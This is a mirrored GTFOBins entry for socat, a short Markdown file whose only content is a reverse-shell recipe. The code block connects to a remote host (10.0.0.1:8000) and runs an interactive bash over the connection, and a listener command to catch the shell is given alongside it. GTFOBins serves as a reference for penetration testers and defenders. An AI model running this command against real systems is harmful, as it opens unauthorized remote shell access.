mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
9 lines
297 B
Markdown
9 lines
297 B
Markdown
---
|
|
functions:
|
|
reverse-shell:
|
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:8000</code> to receive the shell on the other end.
|
|
code: |
|
|
RHOST=10.0.0.1
|
|
RPORT=8000
|
|
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
|
--- |